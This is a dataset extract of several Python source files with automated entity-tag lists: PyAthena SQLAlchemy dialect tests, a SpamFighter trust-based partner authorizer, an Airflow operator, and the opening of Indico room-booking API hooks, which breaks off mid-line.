one_row = Table(""one_row"", MetaData(bind=engine), schema=SCHEMA, autoload=True) + self.assertEqual(len(one_row.c), 1) + self.assertIsNotNone(one_row.c.number_of_rows) + + @with_engine() + def test_reflect_table_include_columns(self, engine, conn): + one_row_complex = Table(""one_row_complex"", MetaData(bind=engine)) + version = float( + re.search(r""^([\d]+\.[\d]+)\..+"", sqlalchemy.__version__).group(1) + ) + if version <= 1.2: + engine.dialect.reflecttable( + conn, one_row_complex, include_columns=[""col_int""], exclude_columns=[] + ) + elif version == 1.3: + # https://docs.sqlalchemy.org/en/13/changelog/changelog_13.html + # #PI:KEY + engine.dialect.reflecttable( + 
conn, + one_row_complex, + include_columns=[""col_int""], + exclude_columns=[], + resolve_fks=True, + ) + else: # version >= 1.4 + # https://docs.sqlalchemy.org/en/14/changelog/changelog_14.html + # #change-0215fae622c01f9409eb1ba2754f4792 + # https://docs.sqlalchemy.org/en/14/core/reflection.html + # #sqlalchemy.engine.reflection.Inspector.reflect_table + insp = sqlalchemy.inspect(engine) + insp.reflect_table( + one_row_complex, + include_columns=[""col_int""], + exclude_columns=[], + resolve_fks=True, + ) + self.assertEqual(len(one_row_complex.c), 1) + self.assertIsNotNone(one_row_complex.c.col_int) + self.assertRaises(AttributeError, lambda: one_row_complex.c.col_tinyint) + + @with_engine() + def test_unicode(self, engine, conn): + unicode_str = ""密林"" + one_row = Table(""one_row"", MetaData(bind=engine)) + returned_str = sqlalchemy.select( + [expression.bindparam(""あまぞん"", unicode_str, type_=String())], + from_obj=one_row, + ).scalar() + self.assertEqual(returned_str, unicode_str) + + @with_engine() + def test_reflect_schemas(self, engine, conn): + insp = sqlalchemy.inspect(engine) + schemas = insp.get_schema_names() + self.assertIn(SCHEMA, schemas) + self.assertIn(""default"", schemas) + + @with_engine() + def test_get_table_names(self, engine, conn): + meta = MetaData() + meta.reflect(bind=engine) + print(meta.tables) + self.assertIn(""one_row"", meta.tables) + self.assertIn(""one_row_complex"", meta.tables) + + insp = sqlalchemy.inspect(engine) + self.assertIn( + ""many_rows"", + insp.get_table_names(schema=SCHEMA), + ) + + @with_engine() + def test_has_table(self, engine, conn): + insp = sqlalchemy.inspect(engine) + self.assertTrue(insp.has_table(""one_row"", schema=SCHEMA)) + self.assertFalse(insp.has_table(""this_table_does_not_exist"", schema=SCHEMA)) + + @with_engine() + def test_get_columns(self, engine, conn): + insp = sqlalchemy.inspect(engine) + actual = insp.get_columns(table_name=""one_row"", schema=SCHEMA)[0] + self.assertEqual(actual[""name""], ""number_of_rows"") + self.assertTrue(isinstance(actual[""type""], INTEGER)) + self.assertTrue(actual[""nullable""]) + self.assertIsNone(actual[""default""]) + self.assertEqual(actual[""ordinal_position""], 1) + self.assertIsNone(actual[""comment""]) + + @with_engine() + def test_char_length(self, engine, conn): + one_row_complex = Table(""one_row_complex"", MetaData(bind=engine), autoload=True) + result = ( + sqlalchemy.select( + [sqlalchemy.func.char_length(one_row_complex.c.col_string)] + ) + .execute() + .scalar() + ) + self.assertEqual(result, len(""a string"")) + + @with_engine() + def test_reflect_select(self, engine, conn): + one_row_complex = Table(""one_row_complex"", MetaData(bind=engine), autoload=True) + self.assertEqual(len(one_row_complex.c), 15) + self.assertIsInstance(one_row_complex.c.col_string, Column) + rows = one_row_complex.select().execute().fetchall() + self.assertEqual(len(rows), 1) + self.assertEqual( + list(rows[0]), + [ + True, + 127, + 32767, + 2147483647, + 9223372036854775807, + 0.5, + 0.25, + ""a string"", + datetime(2017, 1, 1, 0, 0, 0), + date(2017, 1, 2), + b""123"", + ""[1, 2]"", + ""{1=2, 3=4}"", + ""{a=1, b=2}"", + Decimal(""0.1""), + ], + ) + self.assertIsInstance(one_row_complex.c.col_boolean.type, BOOLEAN) + self.assertIsInstance(one_row_complex.c.col_tinyint.type, INTEGER) + self.assertIsInstance(one_row_complex.c.col_smallint.type, INTEGER) + self.assertIsInstance(one_row_complex.c.col_int.type, INTEGER) + self.assertIsInstance(one_row_complex.c.col_bigint.type, BIGINT) + 
self.assertIsInstance(one_row_complex.c.col_float.type, FLOAT) + self.assertIsInstance(one_row_complex.c.col_double.type, FLOAT) + self.assertIsInstance(one_row_complex.c.col_string.type, type(STRINGTYPE)) + self.assertIsInstance(one_row_complex.c.col_timestamp.type, TIMESTAMP) + self.assertIsInstance(one_row_complex.c.col_date.type, DATE) + self.assertIsInstance(one_row_complex.c.col_binary.type, BINARY) + self.assertIsInstance(one_row_complex.c.col_array.type, type(STRINGTYPE)) + self.assertIsInstance(one_row_complex.c.col_map.type, type(STRINGTYPE)) + self.assertIsInstance(one_row_complex.c.col_struct.type, type(STRINGTYPE)) + self.assertIsInstance(one_row_complex.c.col_decimal.type, DECIMAL) + + @with_engine() + def test_reserved_words(self, engine, conn): + """"""Presto uses double quotes, not backticks"""""" + fake_table = Table( + ""select"", MetaData(bind=engine), Column(""current_timestamp"", STRINGTYPE) + ) + query = str(fake_table.select(fake_table.c.current_timestamp == ""a"")) + self.assertIn('""select""', query) + self.assertIn('""current_timestamp""', query) + self.assertNotIn(""`select`"", query) + self.assertNotIn(""`current_timestamp`"", query) + + @with_engine() + def test_retry_if_data_catalog_exception(self, engine, conn): + dialect = engine.dialect + exc = OperationalError( + """", None, ""Database does_not_exist not found. Please check your query."" + ) + self.assertFalse( + dialect._retry_if_data_catalog_exception( + exc, ""does_not_exist"", ""does_not_exist"" + ) + ) + self.assertFalse( + dialect._retry_if_data_catalog_exception( + exc, ""does_not_exist"", ""this_does_not_exist"" + ) + ) + self.assertTrue( + dialect._retry_if_data_catalog_exception( + exc, ""this_does_not_exist"", ""does_not_exist"" + ) + ) + self.assertTrue( + dialect._retry_if_data_catalog_exception( + exc, ""this_does_not_exist"", ""this_does_not_exist"" + ) + ) + + exc = OperationalError( + """", None, ""Namespace does_not_exist not found. Please check your query."" + ) + self.assertFalse( + dialect._retry_if_data_catalog_exception( + exc, ""does_not_exist"", ""does_not_exist"" + ) + ) + self.assertFalse( + dialect._retry_if_data_catalog_exception( + exc, ""does_not_exist"", ""this_does_not_exist"" + ) + ) + self.assertTrue( + dialect._retry_if_data_catalog_exception( + exc, ""this_does_not_exist"", ""does_not_exist"" + ) + ) + self.assertTrue( + dialect._retry_if_data_catalog_exception( + exc, ""this_does_not_exist"", ""this_does_not_exist"" + ) + ) + + exc = OperationalError( + """", None, ""Table does_not_exist not found. Please check your query."" + ) + self.assertFalse( + dialect._retry_if_data_catalog_exception( + exc, ""does_not_exist"", ""does_not_exist"" + ) + ) + self.assertTrue( + dialect._retry_if_data_catalog_exception( + exc, ""does_not_exist"", ""this_does_not_exist"" + ) + ) + self.assertFalse( + dialect._retry_if_data_catalog_exception( + exc, ""this_does_not_exist"", ""does_not_exist"" + ) + ) + self.assertTrue( + dialect._retry_if_data_catalog_exception( + exc, ""this_does_not_exist"", ""this_does_not_exist"" + ) + ) + + exc = OperationalError("""", None, ""foobar."") + self.assertTrue( + dialect._retry_if_data_catalog_exception(exc, ""foobar"", ""foobar"") + ) + + exc = ProgrammingError( + """", None, ""Database does_not_exist not found. 
Please check your query."" + ) + self.assertFalse( + dialect._retry_if_data_catalog_exception( + exc, ""does_not_exist"", ""does_not_exist"" + ) + ) + self.assertFalse( + dialect._retry_if_data_catalog_exception( + exc, ""does_not_exist"", ""this_does_not_exist"" + ) + ) + self.assertFalse( + dialect._retry_if_data_catalog_exception( + exc, ""this_does_not_exist"", ""does_not_exist"" + ) + ) + self.assertFalse( + dialect._retry_if_data_catalog_exception( + exc, ""this_does_not_exist"", ""this_does_not_exist"" + ) + ) + + @with_engine() + def test_get_column_type(self, engine, conn): + dialect = engine.dialect + self.assertEqual(dialect._get_column_type(""boolean""), ""boolean"") + self.assertEqual(dialect._get_column_type(""tinyint""), ""tinyint"") + self.assertEqual(dialect._get_column_type(""smallint""), ""smallint"") + self.assertEqual(dialect._get_column_type(""integer""), ""integer"") + self.assertEqual(dialect._get_column_type(""bigint""), ""bigint"") + self.assertEqual(dialect._get_column_type(""real""), ""real"") + self.assertEqual(dialect._get_column_type(""double""), ""double"") + self.assertEqual(dialect._get_column_type(""varchar""), ""varchar"") + self.assertEqual(dialect._get_column_type(""timestamp""), ""timestamp"") + self.assertEqual(dialect._get_column_type(""date""), ""date"") + self.assertEqual(dialect._get_column_type(""varbinary""), ""varbinary"") + self.assertEqual(dialect._get_column_type(""array(integer)""), ""array"") + self.assertEqual(dialect._get_column_type(""map(integer, integer)""), ""map"") + self.assertEqual(dialect._get_column_type(""row(a integer, b integer)""), ""row"") + self.assertEqual(dialect._get_column_type(""decimal(10,1)""), ""decimal"") + + @with_engine() + def test_contain_percents_character_query(self, engine, conn): + select = sqlalchemy.sql.text( + """""" + SELECT date_parse('20191030', '%Y%m%d') + """""" + ) + table_expression = sqlalchemy.sql.selectable.TextAsFrom(select, []).cte() + + query = sqlalchemy.select([""*""]).select_from(table_expression) + result = engine.execute(query) + self.assertEqual(result.fetchall(), [(datetime(2019, 10, 30),)]) + + query_with_limit = ( + sqlalchemy.sql.select([""*""]).select_from(table_expression).limit(1) + ) + result_with_limit = engine.execute(query_with_limit) + self.assertEqual(result_with_limit.fetchall(), [(datetime(2019, 10, 30),)]) + + @with_engine() + def test_query_with_parameter(self, engine, conn): + select = sqlalchemy.sql.text( + """""" + SELECT :word + """""" + ) + table_expression = sqlalchemy.sql.selectable.TextAsFrom(select, []).cte() + + query = sqlalchemy.select([""*""]).select_from(table_expression) + result = engine.execute(query, word=""cat"") + self.assertEqual(result.fetchall(), [(""cat"",)]) + + query_with_limit = ( + sqlalchemy.select([""*""]).select_from(table_expression).limit(1) + ) + result_with_limit = engine.execute(query_with_limit, word=""cat"") + self.assertEqual(result_with_limit.fetchall(), [(""cat"",)]) + + @with_engine() + def test_contain_percents_character_query_with_parameter(self, engine, conn): + select1 = sqlalchemy.sql.text( + """""" + SELECT date_parse('20191030', '%Y%m%d'), :word + """""" + ) + table_expression1 = sqlalchemy.sql.selectable.TextAsFrom(select1, []).cte() + + query1 = sqlalchemy.select([""*""]).select_from(table_expression1) + result1 = engine.execute(query1, word=""cat"") + self.assertEqual(result1.fetchall(), [(datetime(2019, 10, 30), ""cat"")]) + + query_with_limit1 = ( + 
sqlalchemy.select([""*""]).select_from(table_expression1).limit(1) + ) + result_with_limit1 = engine.execute(query_with_limit1, word=""cat"") + self.assertEqual( + result_with_limit1.fetchall(), [(datetime(2019, 10, 30), ""cat"")] + ) + + select2 = sqlalchemy.sql.text( + """""" + SELECT col_string, :param FROM one_row_complex + WHERE col_string LIKE 'a%' OR col_string LIKE :param + """""" + ) + table_expression2 = sqlalchemy.sql.selectable.TextAsFrom(select2, []).cte() + + query2 = sqlalchemy.select([""*""]).select_from(table_expression2) + result2 = engine.execute(query2, param=""b%"") + self.assertEqual(result2.fetchall(), [(""a string"", ""b%"")]) + + query_with_limit2 = ( + sqlalchemy.select([""*""]).select_from(table_expression2).limit(1) + ) + result_with_limit2 = engine.execute(query_with_limit2, param=""b%"") + self.assertEqual(result_with_limit2.fetchall(), [(""a string"", ""b%"")]) + + @with_engine() + def test_nan_checks(self, engine, conn): + dialect = engine.dialect + self.assertFalse(dialect._is_nan(""string"")) + self.assertFalse(dialect._is_nan(1)) + self.assertTrue(dialect._is_nan(float(""nan""))) + + @with_engine() + def test_to_sql(self, engine, conn): + # TODO pyathena.error.OperationalError: SYNTAX_ERROR: line 1:305: + # Column 'foobar' cannot be resolved. + # def _format_bytes(formatter, escaper, val): + # return val.decode() + table_name = ""to_sql_{0}"".format(str(uuid.uuid4()).replace(""-"", """")) + df = pd.DataFrame( + { + ""col_int"": np.int32([1]), + ""col_bigint"": np.int64([12345]), + ""col_float"": np.float32([1.0]), + ""col_double"": np.float64([1.2345]), + ""col_string"": [""a""], + ""col_boolean"": np.bool_([True]), + ""col_timestamp"": [datetime(2020, 1, 1, 0, 0, 0)], + ""col_date"": [date(2020, 12, 31)], + # ""col_binary"": ""foobar"".encode(), + } + ) + # Explicitly specify column order + df = df[ + [ + ""col_int"", + ""col_bigint"", + ""col_float"", + ""col_double"", + ""col_string"", + ""col_boolean"", + ""col_timestamp"", + ""col_date"", + # ""col_binary"", + ] + ] + df.to_sql( + table_name, + engine, + schema=SCHEMA, + index=False, + if_exists=""replace"", + method=""multi"", + ) + + table = Table(table_name, MetaData(bind=engine), autoload=True) + self.assertEqual( + table.select().execute().fetchall(), + [ + ( + 1, + 12345, + 1.0, + 1.2345, + ""a"", + True, + datetime(2020, 1, 1, 0, 0, 0), + date(2020, 12, 31), + # ""foobar"".encode(), + ) + ], + ) + + @with_engine(verify=""false"") + def test_conn_str_verify(self, engine, conn): + kwargs = conn.connection._kwargs + self.assertFalse(kwargs[""verify""]) + + @with_engine(duration_seconds=""1800"") + def test_conn_str_duration_seconds(self, engine, conn): + kwargs = conn.connection._kwargs + self.assertEqual(kwargs[""duration_seconds""], 1800) + + @with_engine(poll_interval=""5"") + def test_conn_str_poll_interval(self, engine, conn): + self.assertEqual(conn.connection.poll_interval, 5) + + @with_engine(kill_on_interrupt=""false"") + def test_conn_str_kill_on_interrupt(self, engine, conn): + self.assertFalse(conn.connection.kill_on_interrupt) +",20066,"[['URL', 'urllib.pa'], ['LOCATION', 'TestCase'], ['PERSON', 'quote_plus(ENV.s3_staging_dir'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'one_row_complex'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['PERSON', 'meta.tables'], ['PERSON', 'meta.tables'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], 
['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'datetime(2017'], ['PERSON', 'Decimal(""0.1'], ['LOCATION', 'conn'], ['PERSON', 'fake_table'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['PERSON', 'TextAsFrom(select'], ['LOCATION', 'conn'], ['PERSON', 'TextAsFrom(select'], ['LOCATION', 'conn'], ['PERSON', 'select1'], ['PERSON', 'query1'], ['PERSON', 'sqlalchemy.select([""*""]).select_from(table_expression1'], ['PERSON', 'query2 ='], ['PERSON', 'result2'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['PERSON', 'TODO'], ['DATE_TIME', '12'], ['DATE_TIME', '12'], ['LOCATION', 'conn'], ['NRP', 'kwargs'], ['LOCATION', 'conn'], ['NRP', 'kwargs'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['URL', 'https://github.com/dropbox/PyHive/blob/master/pyhive/tests/sqlalchemy_test_case.py'], ['URL', 'https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_hive.py'], ['URL', 'https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_presto.py'], ['URL', 'https://docs.sqlalchemy.org/en/13/changelog/changelog_13.html'], ['URL', 'https://docs.sqlalchemy.org/en/14/changelog/changelog_14.html'], ['URL', 'https://docs.sqlalchemy.org/en/14/core/reflection.html'], ['URL', 'sqlalchemy.sql.sc'], ['URL', 'tests.co'], ['URL', '.amazonaws.com'], ['URL', 'str.fo'], ['URL', 'ENV.re'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'row.c.nu'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'row.c.nu'], ['URL', 're.se'], ['URL', 'engine.dialect.re'], ['URL', 'engine.dialect.re'], ['URL', 'sqlalchemy.engine.reflection.Inspector.re'], ['URL', 'sqlalchemy.in'], ['URL', 'insp.re'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'sqlalchemy.se'], ['URL', 'expression.bi'], ['URL', 'self.as'], ['URL', 'sqlalchemy.in'], ['URL', 'insp.ge'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'meta.re'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'sqlalchemy.in'], ['URL', 'self.as'], ['URL', 'insp.ge'], ['URL', 'sqlalchemy.in'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'sqlalchemy.in'], ['URL', 'insp.ge'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'sqlalchemy.se'], ['URL', 'sqlalchemy.func.ch'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'complex.se'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'table.se'], ['URL', 'table.c.cu'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 
'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'sqlalchemy.sql.se'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.sql.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.sql.se'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.sql.se'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.sql.se'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'pyathena.er'], ['URL', 'val.de'], ['URL', 'np.int'], ['URL', 'np.int'], ['URL', 'np.bo'], ['URL', 'df.to'], ['URL', 'self.as'], ['URL', 'table.se'], ['URL', 'conn.co'], ['URL', 'self.as'], ['URL', 'conn.co'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'conn.co'], ['URL', 'self.as'], ['URL', 'conn.connection.ki']]" +64,"# -*- coding: utf-8 -*- +# +# SpamFighter, Copyright 2008, 2009 NetStream LLC (http://netstream.ru/, dummy@email.com) +# +# This file is part of SpamFighter. +# +# SpamFighter is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# SpamFighter is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with SpamFighter. If not, see <http://www.gnu.org/licenses/>. +# + +"""""" +Authorization module for partners without logins/passwords (trust-based). +"""""" + +from zope.interface import implements +from twisted.internet import defer + +from spamfighter.interfaces import IPartner, IPartnerAuthorizer +from spamfighter.core.partner import PartnerAuthorizationFailedError +from spamfighter.core.domain import getDefaultDomain, BaseDomain +from spamfighter.plugin import loadPlugin, IDefaultDomainProvider +from spamfighter.utils import config + +class NullPartner(object): + """""" + A partner authorized without a login/password (on trust). + + @ivar domain: the partner's root domain + @type domain: L{BaseDomain} + """""" + implements(IPartner) + + def __init__(self): + """""" + Constructor. + """""" + domainProvider = loadPlugin(IDefaultDomainProvider, config.plugins.domain.null_partner_domain_provider) + self.domain = domainProvider.getDefaultDomain() + + def rootDomain(self): + """""" + Get the partner's root domain. + + @return: Deferred, the root domain (L{IDomain}) + @rtype: C{twisted.internet.defer.Deferred} + """""" + return defer.succeed(self.domain) + +class NullPartnerAuthorizer(object): + """""" + Authorization provider for partners without a login/password (on trust). + + In this setup, access to SpamFighter is restricted by other means + (HTTP-proxy, firewall).
+ + @ivar partner: the single partner that provides all access + @type partner: L{NullPartner} + """""" + implements(IPartnerAuthorizer) + + def __init__(self): + """""" + Constructor. + """""" + self.partner = NullPartner() + + def authorize(self, partner_info): + """""" + Perform partner authorization. + + @param partner_info: information about the partner + @return: Deferred, the partner (L{IPartner}) + @rtype: C{twisted.internet.defer.Deferred} + """""" + if partner_info is not None: + return defer.fail(PartnerAuthorizationFailedError()) + + return defer.succeed(self.partner) +",2802,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', 'SpamFighter, Copyright 2008'], ['DATE_TIME', '2009'], ['PERSON', 'Модуль авторизации'], ['PERSON', 'паролей'], ['PERSON', 'Партнер'], ['PERSON', 'Получить'], ['NRP', '@rtype'], ['NRP', 'Провайдер'], ['LOCATION', 'партнеров без логина'], ['LOCATION', 'доступ'], ['PERSON', 'который обеспечивает весь'], ['NRP', 'self.partner'], ['PERSON', 'Выполнить авторизацию'], ['NRP', '@rtype'], ['URL', 'http://netstream.ru/,'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'zope.int'], ['URL', 'twisted.int'], ['URL', 'spamfighter.int'], ['URL', 'spamfighter.core.pa'], ['URL', 'spamfighter.core.do'], ['URL', 'spamfighter.pl'], ['URL', 'config.plugins.domain.nu'], ['URL', 'self.do'], ['URL', 'domainProvider.ge'], ['URL', 'twisted.internet.defer.De'], ['URL', 'defer.su'], ['URL', 'self.do'], ['URL', 'self.pa'], ['URL', 'twisted.internet.defer.De'], ['URL', 'defer.su'], ['URL', 'self.pa']]" +65,"""""" +.. module:: operators.dive_operator + :synopsis: DivePythonOperator for use with TaskRunner + +.. moduleauthor:: Laura Lorenz dummy@email.com +.. moduleauthor:: Miriam Sexton dummy@email.com +"""""" + +from airflow.operators import PythonOperator + +from .dive_operator import DiveOperator + + +class DivePythonOperator(DiveOperator, PythonOperator): + """""" + Python operator that can send along data dependencies to its callable. + Generates the callable by initializing its python object and calling its method. + """""" + + def __init__(self, python_object, python_method=""run"", *args, **kwargs): + self.python_object = python_object + self.python_method = python_method + kwargs['python_callable'] = None + + super(DivePythonOperator, self).__init__(*args, **kwargs) + + def pre_execute(self, context): + context.update(self.op_kwargs) + context.update({""data_dependencies"": self.data_dependencies}) + instantiated_object = self.python_object(context) + self.python_callable = getattr(instantiated_object, self.python_method) +",1075,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Laura Lorenz'], ['PERSON', 'Miriam Sexton'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ':: '], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'self.py'], ['URL', 'self.py'], ['URL', 'self.py'], ['URL', 'self.py'], ['URL', 'self.py']]" +66,"# -*- coding: utf-8 -*- +## +## +## This file is part of Indico +## Copyright (C) 2002 - 2013 European Organization for Nuclear Research (CERN) +## +## Indico is free software: you can redistribute it and/or +## modify it under the terms of the GNU General Public License as +## published by the Free Software Foundation, either version 3 of the +## License, or (at your option) any later version. +## +## Indico is distributed in the hope that it will be useful, but +## WITHOUT ANY WARRANTY; without even the implied warranty of +## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the +## GNU General Public License for more details. +## +## You should have received a copy of the GNU General Public License +## along with Indico. If not, see <http://www.gnu.org/licenses/>. + +from datetime import datetime + +import icalendar +import pytz +from babel.dates import get_timezone +from sqlalchemy import Time, Date +from sqlalchemy.sql import cast +from werkzeug.datastructures import OrderedMultiDict, MultiDict + +from indico.core.config import Config +from indico.core.db import db +from indico.core.errors import IndicoError +from indico.modules.rb.utils import rb_check_user_access +from indico.modules.rb.models.reservations import Reservation, RepeatMapping, RepeatFrequency, ConflictingOccurrences +from indico.modules.rb.models.locations import Location +from indico.modules.rb.models.rooms import Room +from indico.util.date_time import utc_to_server +from indico.web.http_api import HTTPAPIHook +from indico.web.http_api.metadata import ical +from indico.web.http_api.responses import HTTPAPIError +from indico.web.http_api.util import get_query_parameter +from MaKaC.authentication import AuthenticatorMgr +from MaKaC.common.info import HelperMaKaCInfo + + +class RoomBookingHookBase(HTTPAPIHook): + GUEST_ALLOWED = False + + def _getParams(self): + super(RoomBookingHookBase, self)._getParams() + self._fromDT = utc_to_server(self._fromDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._fromDT else None + self._toDT = utc_to_server(self._toDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._toDT else None + self._occurrences = _yesno(get_query_parameter(self._queryParams, ['occ', 'occurrences'], 'no')) + + def _hasAccess(self, aw): + return Config.getInstance().getIsRoomBookingActive() and rb_check_user_access(aw.getUser()) + + +@HTTPAPIHook.register +class RoomHook(RoomBookingHookBase): + # e.g. /export/room/CERN/23.json + TYPES = ('room',) + RE = r'(?P<location>[\w\s]+)/(?P<idlist>\w+(?:-[\w\s]+)*)' + DEFAULT_DETAIL = 'rooms' + MAX_RECORDS = { + 'rooms': 500, + 'reservations': 100 + } + VALID_FORMATS = ('json', 'jsonp', 'xml') + + def _getParams(self): + super(RoomHook, self)._getParams() + self._location = self._pathParams['location'] + self._ids = map(int, self._pathParams['idlist'].split('-')) + if self._detail not in {'rooms', 'reservations'}: + raise HTTPAPIError('Invalid detail level: %s' % self._detail, 400) + + def export_room(self, aw): + loc = Location.find_first(name=self._location) + if loc is None: + return + + # Retrieve rooms + rooms_data = list(Room.get_with_data('vc_equipment', 'non_vc_equipment', + filters=[Room.id.in_(self._ids), Room.location_id == loc.id])) + + # Retrieve reservations + reservations = None + if self._detail == 'reservations': + reservations = OrderedMultiDict(_export_reservations(self, True, False, [ + Reservation.room_id.in_(x['room'].id for x in rooms_data) + ])) + + for result in rooms_data: + yield _serializable_room(result, reservations) + + +@HTTPAPIHook.register +class RoomNameHook(RoomBookingHookBase): + # e.g.
/export/roomName/CERN/pump.json + GUEST_ALLOWED = True + TYPES = ('roomName', ) + RE = r'(?P<location>[\w\s]+)/(?P<room_name>[\w\s\-]+)' + DEFAULT_DETAIL = 'rooms' + MAX_RECORDS = { + 'rooms': 500 + } + VALID_FORMATS = ('json', 'jsonp', 'xml') + + def _getParams(self): + super(RoomNameHook, self)._getParams() + self._location = self._pathParams['location'] + self._room_name = self._pathParams['room_name'] + + def _hasAccess(self, aw): + # Access to RB data (no reservations) is public + return Config.getInstance().getIsRoomBookingActive() + + def export_roomName(self, aw): + loc = Location.find_first(name=self._location) + if loc is None: + return + + search_str = '%{}%'.format(self._room_name) + rooms_data = Room.get_with_data('vc_equipment', 'non_vc_equipment', + filters=[Room.location_id == loc.id, Room.name.ilike(search_str)]) + for result in rooms_data: + yield _serializable_room(result) + + +@HTTPAPIHook.register +class ReservationHook(RoomBookingHookBase): + # e.g. /export/reservation/CERN.json + TYPES = ('reservation', ) + RE = r'(?P<loclist>[\w\s]+(?:-[\w\s]+)*)' + DEFAULT_DETAIL = 'reservations' + MAX_RECORDS = { + 'reservations': 100 + } + VALID_FORMATS = ('json', 'jsonp', 'xml', 'ics') + + @property + def serializer_args(self): + return {'ical_serializer': _ical_serialize_reservation} + + def _getParams(self): + super(ReservationHook, self)._getParams() + self._locations = self._pathParams['loclist'].split('-') + + def export_reservation(self, aw): + locations = Location.find_all(Location.name.in_(self._locations)) + if not locations: + return + + for room_id, reservation in _export_reservations(self, False, True): + yield reservation + + +@HTTPAPIHook.register +class BookRoomHook(HTTPAPIHook): + PREFIX = 'api' + TYPES = ('roomBooking',) + RE = r'bookRoom' + GUEST_ALLOWED = False + VALID_FORMATS = ('json', 'xml') + COMMIT = True + HTTP_POST = True + + def _getParams(self): + super(BookRoomHook, self)._getParams() + self._fromDT = utc_to_server(self._fromDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._fromDT else None + self._toDT = utc_to_server(self._toDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._toDT else None + if not self._fromDT or not self._toDT or self._fromDT.date() != self._toDT.date(): + raise HTTPAPIError('from/to must be on the same day') + elif self._fromDT >= self._toDT: + raise HTTPAPIError('to must be after from') + elif self._fromDT < datetime.now(): + raise HTTPAPIError('You cannot make bookings in the past') + + username = get_query_parameter(self._queryParams, 'username') + avatars = username and filter(None, AuthenticatorMgr().getAvatarByLogin(username).itervalues()) + if not avatars: + raise HTTPAPIError('Username does not exist') + elif len(avatars) != 1: + raise HTTPAPIError('Ambiguous username ({} users 